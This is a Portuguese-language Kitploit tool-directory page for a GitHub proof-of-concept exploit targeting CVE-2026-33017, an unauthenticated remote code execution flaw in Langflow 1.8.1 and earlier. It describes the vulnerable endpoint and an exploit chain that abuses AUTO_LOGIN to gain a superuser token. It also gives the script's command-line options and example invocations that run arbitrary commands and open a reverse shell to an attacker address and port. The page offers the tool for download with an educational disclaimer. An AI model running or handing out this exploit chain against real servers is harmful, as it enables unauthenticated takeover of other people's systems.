Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — A vulnerabilidade no Langflow 1.8.1 e versões anteriores permite que um atacante remoto não autenticado execute comandos arbitrários no host. | Kitploit
Ferramentas/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

A vulnerabilidade no Langflow 1.8.1 e versões anteriores permite que um atacante remoto não autenticado execute comandos arbitrários no host.

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33017-Langflow-RCE-PoC

A vulnerabilidade no Langflow 1.8.1 e versões anteriores permite que um atacante remoto e não autenticado execute comandos arbitrários no host.

Descrição

O endpoint POST /api/v1/build_public_tmp/{flow_id}/flow permite que qualquer pessoa crie flows públicos sem autenticação.

Ao fornecer o parâmetro opcional data, um atacante pode substituir o flow armazenado por sua própria definição personalizada, incorporando código Python arbitrário nas configurações dos nós. Esse código controlado pelo usuário é executado via exec() sem sandboxing ou validação, resultando em execução remota de código não autenticada.

Versões Afetadas

root@kitploit:~
Langflow 1.8.1 e versões anteriores

Recursos

  • Criação de um flow público se AUTO_LOGIN=true
  • Execução do Exploit: Executa comandos arbitrários.
  • Reverse Shell: Inicia um reverse shell baseado em bash.
  • Pré-requisitos

    • A instância do Langflow alvo possui pelo menos um flow público (comum em demos, chatbots ou workflows compartilhados)
    • O UUID de um flow público (pode ser obtido a partir de links/URLs compartilhados)
    • Nenhuma autenticação é necessária

    Quando AUTO_LOGIN=true (configuração padrão), um atacante não autenticado pode satisfazer todas as condições:

    • GET /api/v1/auto_login → obter um token de superusuário
    • POST /api/v1/flows/ → criar um flow público
    • Acionar o exploit via build_public_tmp sem qualquer autenticação

    Uso

    root@kitploit:~
    python cve-2026-33017.py <host> [opções]
    

    Opções:

    root@kitploit:~
    -p PORT, --port PORT: Porta SSH (padrão: 7860)
    
    -id FLOW_ID, --flow_id FLOW_ID: ID do Flow Público (um novo será criado se omitido)
    
    -c COMMAND, --command COMMAND: Comando personalizado a ser executado
    
    --shell: Iniciar um reverse shell
    
    --lhost LHOST: IP do atacante para o reverse shell
    
    --lport LPORT: Porta do atacante para o reverse shell (padrão: 4444)
    
    -t TIMEOUT, --timeout TIMEOUT: Tempo limite de conexão em segundos (padrão: 5)
    

    Exemplos:

    Executar um comando:

    root@kitploit:~
    python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'
    

    Iniciar um reverse shell:

    root@kitploit:~
    python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
    

    Referências

    GitHub Advisory

    NVD CVE-2026-33017

    Medium

    ⚠️ Aviso Legal

    Este PoC é apenas para fins educacionais e de pesquisa. Use por sua conta e risco. O autor não é responsável por qualquer uso indevido ou dano causado.

    Baixar ferramenta